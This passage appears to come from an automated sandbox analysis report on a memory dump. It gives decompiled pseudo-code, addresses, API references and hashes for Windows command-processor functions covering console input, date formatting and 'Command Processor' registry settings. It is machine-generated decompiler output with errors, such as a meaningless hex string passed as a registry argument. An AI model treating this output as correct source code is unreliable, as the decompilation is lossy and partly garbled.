									__esi = __esi + 1;
									__esi = __esi + 1;
									__eflags =  *__esi - __dx;
								} while ( *__esi == __dx);
								__eax = __ecx + __ecx;
								__esi = __esi - __eax;
								__eflags = __ecx - 1;
								if(__ecx != 1) {
									__eflags = __dx - 0x64;
									if(__dx == 0x64) {
										_t39 = __ebp - 0x148;
										 *_t39 =  *(__ebp - 0x148) & 0x00000000;
										__eflags =  *_t39;
									}
									__eflags = __ecx - 3;
									if(__ecx <= 3) {
										__esi = __esi + __eax;
									} else {
										__ecx = __esi + __eax;
										__eax = __ecx;
										_t42 = __eax + 2; // 0x3
										__edx = _t42;
										do {
											__di =  *__eax;
											__eax = __eax + 1;
											__eax = __eax + 1;
											__eflags = __di;
										} while (__di != 0);
										__eax = __eax - __edx;
										__eax = __eax >> 1;
										__eax = __eax + __eax + 2;
										__esi = __esi + 6;
										__eax = memmove(__esi, __ecx, __eax);
									}
									goto L14;
								}
								__eax = __esi;
								_t27 = __eax + 2; // 0x4
								__edx = _t27;
								do {
									__cx =  *__eax;
									__eax = __eax + 1;
									__eax = __eax + 1;
									__eflags = __cx;
								} while (__cx != 0);
								__eax = __eax - __edx;
								__eax = __eax + __eax + 2;
								_t30 = __esi + 2; // 0x4
								_t30 = memmove(_t30, __esi, _t30);
								__esi = __esi + 4;
								goto L14;
							}
							__eflags = __dx - 0x4d;
							if(__dx == 0x4d) {
								goto L26;
							}
							goto L13;
							L14:
							__eflags =  *__esi;
						} while ( *__esi != 0);
						__ebx =  *(__ebp - 0x150);
						goto L16;
					}
				}
				L1:
				_t99 = _t113 - 0x160;
				_t110 = GetDateFormatW(E4A55756D(), 0, _t113 - 0x160, _t113 - 0x144, 0, 0);
				if(_t110 == 0) {
					L42:
					_t67 = GetLastError();
					_push(0);
					 *0x4a574128 = _t67;
					_push(_t67);
					goto L43;
				}
				_t112 = _t110 + 1;
				_t72 = realloc( *0x4a5740d8, _t112 + _t112);
				_pop(_t99);
				if(_t72 == 0) {
					goto L44;
				}
				 *0x4a5740d8 = _t72;
				 *0x4a5740dc = _t112;
				if(GetDateFormatW(E4A55756D(), 0, _t113 - 0x160, _t113 - 0x144, _t72, _t112) != 0) {
					goto L18;
				}
				goto L42;
			}




















                                0x4a564e46
                                0x4a564e48
                                0x4a564e4f
                                0x4a564e5c
                                0x4a564e63
                                0x4a562768
                                0x4a562775
                                0x4a562783
                                0x4a562789
                                0x4a562790
                                0x4a564f01
                                0x4a564f05
                                0x4a564f0c
                                0x4a564f13
                                0x4a564f1a
                                0x4a564f1e
                                0x4a564f20
                                0x4a564f22
                                0x4a564f23
                                0x4a564f23
                                0x4a564f23
                                0x4a564f23
                                0x4a564f25
                                0x4a564f25
                                0x4a564f27
                                0x4a564f2c
                                0x4a564f2f
                                0x4a564f3b
                                0x4a564f3e
                                0x4a564f40
                                0x4a564f42
                                0x4a564f44
                                0x4a564f44
                                0x4a564f31
                                0x4a564f31
                                0x4a564f33
                                0x4a564f35
                                0x4a564f37
                                0x4a564f37
                                0x4a564f46
                                0x4a564f4d
                                0x4a564f72
                                0x4a564f72
                                0x4a564f73
                                0x4a564f78
                                0x4a564f79
                                0x4a564f7a
                                0x4a564f8d
                                0x4a564f92
                                0x00000000
                                0x4a564f4f
                                0x4a564f57
                                0x4a564f5d
                                0x4a564f5e
                                0x4a564f5f
                                0x4a564f61
                                0x4a564efb
                                0x4a564efb
                                0x4a564efd
                                0x4a564eed
                                0x4a564eed
                                0x4a564ef4
                                0x00000000
                                0x4a564ef4
                                0x4a564f63
                                0x4a564f68
                                0x00000000
                                0x4a564f68
                                0x4a562796
                                0x4a562796
                                0x4a56279d
                                0x4a5627a3
                                0x4a5627ac
                                0x4a5627b2
                                0x4a5627b8
                                0x4a5627ba
                                0x4a564e7c
                                0x4a564e7c
                                0x4a5627c0
                                0x4a5627c8
                                0x4a5627ce
                                0x4a56280e
                                0x4a562821
                                0x4a56282a
                                0x4a56282f
                                0x4a562836
                                0x4a562838
                                0x4a56283a
                                0x00000000
                                0x00000000
                                0x4a562840
                                0x4a562847
                                0x00000000
                                0x00000000
                                0x4a56284d
                                0x4a562861
                                0x4a562866
                                0x4a562868
                                0x4a564fa0
                                0x4a564fa6
                                0x4a564fbf
                                0x4a564fc4
                                0x4a564fc6
                                0x4a564fc9
                                0x4a564fd4
                                0x4a564fda
                                0x4a564fcb
                                0x4a564fcb
                                0x4a564fcc
                                0x4a564fcc
                                0x4a564fdb
                                0x4a564fe0
                                0x4a5628a3
                                0x4a5628a6
                                0x4a5628a7
                                0x4a5628aa
                                0x4a5628b1
                                0x4a5628b1
                                0x4a564fb3
                                0x00000000
                                0x4a564fb9
                                0x4a56286e
                                0x4a562875
                                0x4a562881
                                0x4a56288b
                                0x4a562890
                                0x4a562890
                                0x4a562892
                                0x4a562895
                                0x4a562895
                                0x4a562899
                                0x4a56289a
                                0x4a56289a
                                0x4a56289f
                                0x4a56289f
                                0x4a5628a1
                                0x00000000
                                0x4a5628a1
                                0x4a562877
                                0x4a56287b
                                0x4a564fed
                                0x4a564ff2
                                0x4a564ff4
                                0x4a565021
                                0x4a56502f
                                0x4a565034
                                0x4a564ff6
                                0x4a565000
                                0x4a56500e
                                0x4a565016
                                0x4a565016
                                0x4a56503a
                                0x4a56503d
                                0x4a56503e
                                0x00000000
                                0x4a56503e
                                0x00000000
                                0x4a5627d0
                                0x4a5627d0
                                0x4a5627d6
                                0x4a5627d6
                                0x4a5627d9
                                0x4a5627dd
                                0x4a564e86
                                0x4a564e88
                                0x4a564e8e
                                0x4a564e91
                                0x4a562800
                                0x4a562800
                                0x4a562801
                                0x4a562801
                                0x00000000
                                0x4a562801
                                0x4a5627e3
                                0x4a5627ea
                                0x00000000
                                0x00000000
                                0x4a5627ec
                                0x4a5627f0
                                0x4a5628b4
                                0x4a5628b4
                                0x4a5628b4
                                0x4a5628b6
                                0x4a5628b6
                                0x4a5628b7
                                0x4a5628b8
                                0x4a5628b9
                                0x4a5628b9
                                0x4a5628be
                                0x4a5628c1
                                0x4a5628c3
                                0x4a5628c6
                                0x4a564e9c
                                0x4a564ea0
                                0x4a564ea2
                                0x4a564ea2
                                0x4a564ea2
                                0x4a564ea2
                                0x4a564ea9
                                0x4a564eac
                                0x4a564ed8
                                0x4a564eae
                                0x4a564eae
                                0x4a564eb1
                                0x4a564eb3
                                0x4a564eb3
                                0x4a564eb6
                                0x4a564eb6
                                0x4a564eb9
                                0x4a564eba
                                0x4a564ebb
                                0x4a564ebb
                                0x4a564ec0
                                0x4a564ec2
                                0x4a564ec4
                                0x4a564eca
                                0x4a564ece
                                0x4a564ed0
                                0x00000000
                                0x4a564eac
                                0x4a5628cc
                                0x4a5628ce
                                0x4a5628ce
                                0x4a5628d1
                                0x4a5628d1
                                0x4a5628d4
                                0x4a5628d5
                                0x4a5628d6
                                0x4a5628d6
                                0x4a5628db
                                0x4a5628df
                                0x4a5628e4
                                0x4a5628e9
                                0x4a5628ee
                                0x00000000
                                0x4a5628ee
                                0x4a5627f6
                                0x4a5627fa
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a562802
                                0x4a562802
                                0x4a562802
                                0x4a562808
                                0x00000000
                                0x4a562808
                                0x4a5627ce
                                0x4a562696
                                0x4a5626a1
                                0x4a5626b1
                                0x4a5626b5
                                0x4a564edf
                                0x4a564edf
                                0x4a564ee5
                                0x4a564ee7
                                0x4a564eec
                                0x00000000
                                0x4a564eec
                                0x4a5626bb
                                0x4a5626c6
                                0x4a5626cd
                                0x4a5626d0
                                0x00000000
                                0x00000000
                                0x4a5626d8
                                0x4a5626ed
                                0x4a5626fd
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • GetSystemTime.KERNEL32(?,00002000,4A580640,74CBA9E9), ref: 4A564E4F
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 4A564E63
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Time$System$File
                                • String ID:
                                • API String ID: 2838179519-0
                                • Opcode ID: 47032e58539359935439c1281a53ba2be811a71b6e43b6cc73a582d1b9775180
                                • Instruction ID: 96c367a88852959c51d4d418f3e70cc552014fb478a413f151d7c4efbd357fe5
                                • Opcode Fuzzy Hash: 47032e58539359935439c1281a53ba2be811a71b6e43b6cc73a582d1b9775180
                                • Instruction Fuzzy Hash: 11D092B180915C9ECB12ABA0DD589DB7BBCBB0A345F0509D3E145D7425D631AA858B10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A557C63, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E4A557C63() {

				SetUnhandledExceptionFilter(E4A5721A6);
				return 0;
			}



                                0x4a557c68
                                0x4a557c70

                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32 ref: 4A557C68
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 539f2b5285de4b18e5621b82f236696f69985981bd8fa5c63ff40c7cac72ff8c
                                • Instruction ID: c7d58305c42ee7fe270ad72a38a11529e017aca975ac0d18bcc25e9f9469c16c
                                • Opcode Fuzzy Hash: 539f2b5285de4b18e5621b82f236696f69985981bd8fa5c63ff40c7cac72ff8c
                                • Instruction Fuzzy Hash: 9C9002B4512240465A0137B09B0894A2DB47A99216B5104956202D8C18DB6148009611
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5634E2, Relevance: 54.6, APIs: 24, Strings: 7, Instructions: 306memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 53%
                                			E4A5634E2(void* _a4, void* _a8, long _a12, DWORD* _a16) {
				void* _v8;
				struct _COORD _v12;
				void* _v16;
				long _v20;
				long _v24;
				int _v28;
				void* _v32;
				signed int _v36;
				void* _v40;
				void _v44;
				intOrPtr _v62;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t71;
				int _t72;
				int _t82;
				signed int _t86;
				signed int _t87;
				signed int _t92;
				void* _t94;
				signed int _t96;
				long _t97;
				void* _t98;
				void* _t104;
				int _t109;
				void* _t110;
				DWORD* _t127;
				void* _t129;
				void* _t130;
				signed char _t132;
				signed char _t133;
				signed int _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				signed int _t141;
				signed int _t144;
				signed int _t145;
				void* _t146;
				void* _t147;
				signed int _t150;
				signed int _t151;
				void* _t154;
				long _t157;
				signed int _t158;
				void* _t160;
				void* _t167;
				void* _t172;
				void* _t173;

				_t71 = GetStdHandle(0xfffffff5);
				_v16 = _t71;
				if(_t71 == 0xffffffff) {
					__imp___get_osfhandle(1);
					_v16 = _t71;
				}
				if( *0x4a574081 == 0 ||  *0x4a5740a0 >= 0x20 ||  *0x4a5740a4 >= 0x20 || GetConsoleScreenBufferInfo(_v16,  &_v68) == 0) {
					_t72 = ReadConsoleW(_a4, _a8, _a12, _a16, 0);
				} else {
					_t132 =  *0x4a5740a4; // 0x20
					_v12 = _v68.dwCursorPosition;
					_t133 =  *0x4a5740a0; // 0x20
					_t144 = 1 << _t133;
					_t157 = 0;
					_v44 = 0x10;
					_v40 = 0;
					_v36 = 1 << _t132 | 1;
					_v32 = 0;
					E4A563599();
					_t154 = _a8;
					_v8 = 0;
					while(1) {
						L6:
						_t127 = _a16;
						_t82 = ReadConsoleW(_a4, _t154, _a12, _t127,  &_v44);
						_v28 = _t82;
						_t83 =  *_t127;
						_v24 =  *_t127;
						_t167 =  *0x4a5741b4 - _t157; // 0x0
						if(_t167 != 0) {
							E4A551E6C(_t83);
							if(_v8 != _t157) {
								HeapFree(GetProcessHeap(), _t157, _v8);
							}
							_v8 = _t157;
						}
						if(_v28 == _t157) {
							break;
						}
						_a8 = _t157;
						_t86 = 0;
						_t158 = _t157 | 0xffffffff;
						_t145 = _t144 | 0xffffffff;
						if( *_t127 <= 0) {
							L18:
							_t157 = 0;
							break;
						} else {
							while(1) {
								_t134 =  *(_t154 + _t86 * 2) & 0x0000ffff;
								if(_t134 == 0xd) {
									break;
								}
								_t172 = _t134 -  *0x4a5740a0; // 0x20
								if(_t172 == 0) {
									_t158 = _t86;
									goto L26;
								} else {
									_t173 = _t134 -  *0x4a5740a4; // 0x20
									if(_t173 == 0) {
										_t158 = _t86;
										_a8 = 1;
										L25:
										__eflags = _t145 - 0xffffffff;
										if(_t145 != 0xffffffff) {
											goto L18;
										} else {
											L26:
											__eflags = _t158 - 0xffffffff;
											if(_t158 == 0xffffffff) {
												goto L18;
											} else {
												_t135 = _v8;
												_t87 = 0;
												 *_t127 = _t158;
												 *((short*)(_t154 + _t158 * 2)) = 0;
												__eflags = _t135;
												if(_t135 == 0) {
													L37:
													_t129 = 1;
													__eflags = 1;
												} else {
													_t87 = _t154;
													while(1) {
														_t150 =  *_t87;
														__eflags = _t150 -  *_t135;
														if(_t150 !=  *_t135) {
															break;
														}
														__eflags = _t150;
														if(_t150 == 0) {
															L33:
															_t87 = 0;
														} else {
															_t151 =  *((intOrPtr*)(_t87 + 2));
															__eflags = _t151 -  *((intOrPtr*)(_t135 + 2));
															if(_t151 !=  *((intOrPtr*)(_t135 + 2))) {
																break;
															} else {
																_t87 = _t87 + 4;
																_t135 = _t135 + 4;
																__eflags = _t151;
																if(_t151 != 0) {
																	continue;
																} else {
																	goto L33;
																}
															}
														}
														L35:
														__eflags = _t87;
														if(_t87 != 0) {
															goto L37;
														} else {
															_t129 = 0;
														}
														goto L38;
													}
													asm("sbb eax, eax");
													asm("sbb eax, 0xffffffff");
													goto L35;
												}
												L38:
												__eflags = _a8;
												if(__eflags == 0) {
													__eflags = _t158 - 2;
													if(__eflags > 0) {
														__imp___wcsnicmp(_t154, "cd ", 3);
														_t160 = _t160 + 0xc;
														__eflags = _t87;
														if(__eflags == 0) {
															L47:
															_a8 = 1;
														} else {
															__imp___wcsnicmp(_t154, "rd ", 3);
															_t160 = _t160 + 0xc;
															__eflags = _t87;
															if(__eflags == 0) {
																goto L47;
															} else {
																__imp___wcsnicmp(_t154, "md ", 3);
																_t160 = _t160 + 0xc;
																__eflags = _t87;
																if(__eflags == 0) {
																	goto L47;
																} else {
																	__imp___wcsnicmp(_t154, L"chdir ", 6);
																	_t160 = _t160 + 0xc;
																	__eflags = _t87;
																	if(__eflags == 0) {
																		goto L47;
																	} else {
																		__imp___wcsnicmp(_t154, L"rmdir ", 6);
																		_t160 = _t160 + 0xc;
																		__eflags = _t87;
																		if(__eflags == 0) {
																			goto L47;
																		} else {
																			__imp___wcsnicmp(_t154, L"mkdir ", 6);
																			_t160 = _t160 + 0xc;
																			__eflags = _t87;
																			if(__eflags == 0) {
																				goto L47;
																			} else {
																				__imp___wcsnicmp(_t154, L"pushd ", 6);
																				_t160 = _t160 + 0xc;
																				__eflags = _t87;
																				if(__eflags == 0) {
																					goto L47;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
												_push(_t129);
												_push(_a8);
												_push( !(_v32 >> 4) & 0x00000001);
												_push(_t158);
												_push(_a12);
												_push(_t154);
												_t92 = E4A571877(_t129, _t154, _t158, __eflags);
												__eflags = _t92;
												if(_t92 == 0) {
													 *0x4a574034(0xffffffff);
													_t94 = _t154;
													_t59 = _t94 + 2; // 0x8
													_t146 = _t59;
													do {
														_t136 =  *_t94;
														_t94 = _t94 + 2;
														__eflags = _t136;
													} while (_t136 != 0);
													_t96 = _t94 - _t146;
													__eflags = _t96;
													_t97 = _t96 >> 1;
												} else {
													_t130 = _v16;
													_t109 = GetConsoleScreenBufferInfo(_t130,  &_v68);
													__eflags = _t109;
													if(_t109 != 0) {
														_t141 = _v62 - (_v12.X + _t158) / _v68.dwSize;
														__eflags = _t141;
														_v12.Y = _t141;
													}
													_t110 = _t154;
													_t50 = _t110 + 2; // 0x8
													_t147 = _t50;
													do {
														_t138 =  *_t110;
														_t110 = _t110 + 2;
														__eflags = _t138;
													} while (_t138 != 0);
													_v20 = _t110 - _t147 >> 1;
													SetConsoleCursorPosition(_t130, _v12);
													_push( &_v24);
													_push(_v12);
													_push(_v24);
													_push(0x20);
													_push(_t130);
													FillConsoleOutputCharacterW();
													WriteConsoleW(_t130, _t154, _v20,  &_v20, 0);
													_t97 = _v20;
												}
												__eflags = _v8;
												_v40 = _t97;
												if(_v8 != 0) {
													HeapFree(GetProcessHeap(), 0, _v8);
												}
												_t98 = _t154;
												_t63 = _t98 + 2; // 0x8
												_t144 = _t63;
												do {
													_t137 =  *_t98;
													_t98 = _t98 + 2;
													__eflags = _t137;
												} while (_t137 != 0);
												_t64 = (_t98 - _t144 >> 1) + 1; // 0x9
												_t159 = _t64;
												_t104 = HeapAlloc(GetProcessHeap(), 0, _t64 + _t64);
												_v8 = _t104;
												__eflags = _t104;
												if(_t104 == 0) {
													_t72 = 0;
												} else {
													E4A55185A(_t104, _t159, _t154);
													_t157 = 0;
													goto L6;
												}
											}
										}
									} else {
										_t86 = _t86 + 1;
										if(_t86 <  *_t127) {
											continue;
										} else {
											goto L18;
										}
									}
								}
								goto L65;
							}
							_t145 = _t86;
							goto L25;
						}
						goto L65;
					}
					if(_v8 != _t157) {
						HeapFree(GetProcessHeap(), _t157, _v8);
					}
					_t72 = _v28;
				}
				L65:
				return _t72;
			}
























































                                0x4a5634ec
                                0x4a5634f2
                                0x4a5634f8
                                0x4a564237
                                0x4a56423e
                                0x4a56423e
                                0x4a563508
                                0x4a5644ef
                                0x4a56353f
                                0x4a563542
                                0x4a563548
                                0x4a563552
                                0x4a563559
                                0x4a56355b
                                0x4a56355d
                                0x4a563564
                                0x4a563569
                                0x4a56356c
                                0x4a56356f
                                0x4a563574
                                0x4a563577
                                0x4a56357a
                                0x4a56357a
                                0x4a56357a
                                0x4a563589
                                0x4a564246
                                0x4a564249
                                0x4a56424b
                                0x4a56424e
                                0x4a564254
                                0x4a564256
                                0x4a56425e
                                0x4a56426b
                                0x4a56426b
                                0x4a564271
                                0x4a564271
                                0x4a564277
                                0x00000000
                                0x00000000
                                0x4a564279
                                0x4a56427c
                                0x4a56427e
                                0x4a564281
                                0x4a564286
                                0x4a5642a9
                                0x4a5642a9
                                0x00000000
                                0x4a564288
                                0x4a564288
                                0x4a564288
                                0x4a564290
                                0x00000000
                                0x00000000
                                0x4a564292
                                0x4a564299
                                0x4a5642cd
                                0x00000000
                                0x4a56429b
                                0x4a56429b
                                0x4a5642a2
                                0x4a5642d1
                                0x4a5642d3
                                0x4a5642da
                                0x4a5642da
                                0x4a5642dd
                                0x00000000
                                0x4a5642df
                                0x4a5642df
                                0x4a5642df
                                0x4a5642e2
                                0x00000000
                                0x4a5642e4
                                0x4a5642e4
                                0x4a5642e7
                                0x4a5642e9
                                0x4a5642eb
                                0x4a5642ef
                                0x4a5642f1
                                0x4a564328
                                0x4a56432a
                                0x4a56432a
                                0x4a5642f3
                                0x4a5642f3
                                0x4a5642f5
                                0x4a5642f5
                                0x4a5642f8
                                0x4a5642fb
                                0x00000000
                                0x00000000
                                0x4a5642fd
                                0x4a564300
                                0x4a564317
                                0x4a564317
                                0x4a564302
                                0x4a564302
                                0x4a564306
                                0x4a56430a
                                0x00000000
                                0x4a56430c
                                0x4a56430c
                                0x4a56430f
                                0x4a564312
                                0x4a564315
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a564315
                                0x4a56430a
                                0x4a564320
                                0x4a564320
                                0x4a564322
                                0x00000000
                                0x4a564324
                                0x4a564324
                                0x4a564324
                                0x00000000
                                0x4a564322
                                0x4a56431b
                                0x4a56431d
                                0x00000000
                                0x4a56431d
                                0x4a56432b
                                0x4a56432b
                                0x4a56432f
                                0x4a564335
                                0x4a564338
                                0x4a564346
                                0x4a56434c
                                0x4a56434f
                                0x4a564351
                                0x4a5643d1
                                0x4a5643d1
                                0x4a564353
                                0x4a56435b
                                0x4a564361
                                0x4a564364
                                0x4a564366
                                0x00000000
                                0x4a564368
                                0x4a564370
                                0x4a564376
                                0x4a564379
                                0x4a56437b
                                0x00000000
                                0x4a56437d
                                0x4a564385
                                0x4a56438b
                                0x4a56438e
                                0x4a564390
                                0x00000000
                                0x4a564392
                                0x4a56439a
                                0x4a5643a0
                                0x4a5643a3
                                0x4a5643a5
                                0x00000000
                                0x4a5643a7
                                0x4a5643af
                                0x4a5643b5
                                0x4a5643b8
                                0x4a5643ba
                                0x00000000
                                0x4a5643bc
                                0x4a5643c4
                                0x4a5643ca
                                0x4a5643cd
                                0x4a5643cf
                                0x00000000
                                0x00000000
                                0x4a5643cf
                                0x4a5643ba
                                0x4a5643a5
                                0x4a564390
                                0x4a56437b
                                0x4a564366
                                0x4a564351
                                0x4a564338
                                0x4a5643db
                                0x4a5643dc
                                0x4a5643e7
                                0x4a5643e8
                                0x4a5643e9
                                0x4a5643ec
                                0x4a5643ed
                                0x4a5643f2
                                0x4a5643f4
                                0x4a56446a
                                0x4a564470
                                0x4a564472
                                0x4a564472
                                0x4a564475
                                0x4a564475
                                0x4a564479
                                0x4a56447a
                                0x4a56447a
                                0x4a56447f
                                0x4a56447f
                                0x4a564481
                                0x4a5643f6
                                0x4a5643f6
                                0x4a5643fe
                                0x4a564404
                                0x4a564406
                                0x4a564419
                                0x4a564419
                                0x4a56441b
                                0x4a56441b
                                0x4a56441f
                                0x4a564421
                                0x4a564421
                                0x4a564424
                                0x4a564424
                                0x4a564428
                                0x4a564429
                                0x4a564429
                                0x4a564436
                                0x4a564439
                                0x4a564442
                                0x4a564443
                                0x4a564446
                                0x4a564449
                                0x4a56444b
                                0x4a56444c
                                0x4a56445d
                                0x4a564463
                                0x4a564463
                                0x4a564483
                                0x4a564487
                                0x4a56448a
                                0x4a564498
                                0x4a564498
                                0x4a56449e
                                0x4a5644a0
                                0x4a5644a0
                                0x4a5644a3
                                0x4a5644a3
                                0x4a5644a7
                                0x4a5644a8
                                0x4a5644a8
                                0x4a5644b1
                                0x4a5644b1
                                0x4a5644c1
                                0x4a5644c7
                                0x4a5644ca
                                0x4a5644cc
                                0x4a5644dd
                                0x4a5644ce
                                0x4a5644d1
                                0x4a5644d6
                                0x00000000
                                0x4a5644d6
                                0x4a5644cc
                                0x4a5642e2
                                0x4a5642a4
                                0x4a5642a4
                                0x4a5642a7
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5642a7
                                0x4a5642a2
                                0x00000000
                                0x4a564299
                                0x4a5642c9
                                0x00000000
                                0x4a5642c9
                                0x00000000
                                0x4a564286
                                0x4a5642ae
                                0x4a5642bb
                                0x4a5642bb
                                0x4a5642c1
                                0x4a5642c1
                                0x4a5644f5
                                0x4a5644f9

                                APIs
                                • GetStdHandle.KERNEL32(000000F5,?,00000004,766F5129,00000000,?,4A55745B,-00000003,00000000,00000000,00000000,00000000,?), ref: 4A5634EC
                                • GetConsoleScreenBufferInfo.KERNEL32 ref: 4A563531
                                • ReadConsoleW.KERNEL32(4A574210,00000006,00000021,?,00000010), ref: 4A563589
                                • _get_osfhandle.MSVCRT ref: 4A564237
                                • GetProcessHeap.KERNEL32(00000000,00000000,?,4A55745B), ref: 4A564264
                                • HeapFree.KERNEL32(00000000,?,4A55745B), ref: 4A56426B
                                • GetProcessHeap.KERNEL32(00000000,?,?,4A55745B), ref: 4A5642B4
                                • HeapFree.KERNEL32(00000000,?,4A55745B), ref: 4A5642BB
                                  • Part of subcall function 4A551E6C: EnterCriticalSection.KERNEL32(4A55851C), ref: 4A551E72
                                  • Part of subcall function 4A551E6C: LeaveCriticalSection.KERNEL32(?,4A551DBC,?,00000021,-00000003,4A588640,4A574210,00000000,00000000,?,4A551CE6,4A588640,4A574210,4A574210,?,4A551C8D), ref: 4A551E85
                                • _wcsnicmp.MSVCRT ref: 4A564346
                                • _wcsnicmp.MSVCRT ref: 4A56435B
                                • _wcsnicmp.MSVCRT ref: 4A564370
                                • _wcsnicmp.MSVCRT ref: 4A564385
                                • _wcsnicmp.MSVCRT ref: 4A56439A
                                • _wcsnicmp.MSVCRT ref: 4A5643AF
                                • _wcsnicmp.MSVCRT ref: 4A5643C4
                                • GetConsoleScreenBufferInfo.KERNEL32 ref: 4A5643FE
                                • SetConsoleCursorPosition.KERNEL32 ref: 4A564439
                                • FillConsoleOutputCharacterW.KERNEL32(00000001,00000020,?,4A574210,?), ref: 4A56444C
                                • WriteConsoleW.KERNEL32 ref: 4A56445D
                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000), ref: 4A564491
                                • HeapFree.KERNEL32(00000000), ref: 4A564498
                                • GetProcessHeap.KERNEL32(00000000,00000008,?,4A55745B), ref: 4A5644BA
                                • HeapAlloc.KERNEL32(00000000,?,4A55745B), ref: 4A5644C1
                                • ReadConsoleW.KERNEL32(4A574210,00000006,00000021,?,00000000), ref: 4A5644EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$Console_wcsnicmp$Process$Free$BufferCriticalInfoReadScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
                                • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                • API String ID: 1493623682-3100821235
                                • Opcode ID: b39eff57f5f1e66c4361bc94d22efd50e6f65f636d33b90c97a608b2111305d5
                                • Instruction ID: 0d3470265801a9831597e0d25d206f7a5c4b5db54d27a5881368644c4883c2ad
                                • Opcode Fuzzy Hash: b39eff57f5f1e66c4361bc94d22efd50e6f65f636d33b90c97a608b2111305d5
                                • Instruction Fuzzy Hash: ADB1F174A01216EFDB10AFA4CF48BAE7FB9FF46319F008616F91AE6594D7308A50CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A557E13, Relevance: 47.6, APIs: 18, Strings: 9, Instructions: 314registryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 69%
                                			E4A557E13(int _a4, intOrPtr _a8) {
				signed int _v8;
				long _v4104;
				int _v4108;
				int _v4112;
				void* _v4116;
				intOrPtr* _v4120;
				char _v4124;
				intOrPtr _v4128;
				intOrPtr _v4132;
				char _v4136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t99;
				int _t101;
				signed int _t113;
				signed int _t117;
				signed int _t121;
				long _t135;
				int _t136;
				long _t139;
				wchar_t* _t140;
				signed int _t143;
				wchar_t* _t144;
				signed int _t147;
				wchar_t* _t148;
				signed int _t151;
				signed int _t155;
				int _t161;
				int _t162;
				intOrPtr _t165;
				void* _t174;
				void* _t175;
				wchar_t** _t176;
				signed int _t178;
				void* _t179;
				void* _t181;

				E4A552C26(0x1024);
				_t99 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t99 ^ _t178;
				_t101 = _a4;
				_t174 = 2;
				_v4136 = 0x80000002;
				_v4132 = 0x80000001;
				if(_a8 < _t174) {
					L40:
					return E4A5513A9(_t101, _t161, _v8 ^ _t178, _t174, _t175, _t176);
				} else {
					if( *0x4a590670 != 0) {
						 *0x4a574081 = 1;
					}
					_push(__ebx);
					__ecx =  &_v4136;
					_push(__esi);
					__ecx =  &_v4136 - __eax;
					_push(__edi);
					__edi = RegQueryValueExW;
					_v4120 = __eax;
					_v4128 = __ecx;
					_v4124 = __edx;
					__ebx = 0x1000;
					while(1) {
						_t176 = 0;
						_t101 = RegOpenKeyExW( *(_t165 + _v4120), L"Software\\Microsoft\\Command Processor", 0, "effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0",  &_v4116);
						if(_t101 != 0) {
							goto L38;
						}
						_v4108 = 0;
						_v4112 = _t161;
						_t113 = RegQueryValueExW(_v4116, L"DisableUNCCheck", 0,  &_v4108,  &_v4104,  &_v4112);
						if(_t113 == 0) {
							if(_v4108 != 4) {
								if(_v4108 != 1) {
									goto L7;
								}
								_t148 =  &_v4104;
								__imp___wtol(_t148);
								asm("sbb al, al");
								_t151 =  ~(_t148 - 1) + 1;
								L51:
								 *0x4a5906b0 = _t151;
								goto L7;
							}
							_t151 = _t113 & 0xffffff00 | _v4104 != 0x00000000;
							goto L51;
						}
						L7:
						_v4112 = _t161;
						_t117 = RegQueryValueExW(_v4116, L"EnableExtensions", _t176,  &_v4108,  &_v4104,  &_v4112);
						if(_t117 != 0) {
							L11:
							_v4112 = _t161;
							_t121 = RegQueryValueExW(_v4116, L"DelayedExpansion", _t176,  &_v4108,  &_v4104,  &_v4112);
							if(_t121 == 0) {
								if(_v4108 != 4) {
									if(_v4108 != 1) {
										goto L12;
									}
									_t140 =  &_v4104;
									__imp___wtol(_t140);
									asm("sbb al, al");
									_t143 =  ~(_t140 - 1) + 1;
									L57:
									 *0x4a574082 = _t143;
									goto L12;
								}
								_t143 = _t121 & 0xffffff00 | _v4104 != _t176;
								goto L57;
							}
							L12:
							_v4112 = _t161;
							if(RegQueryValueExW(_v4116, L"DefaultColor", _t176,  &_v4108,  &_v4104,  &_v4112) != 0) {
								L16:
								_v4112 = _t161;
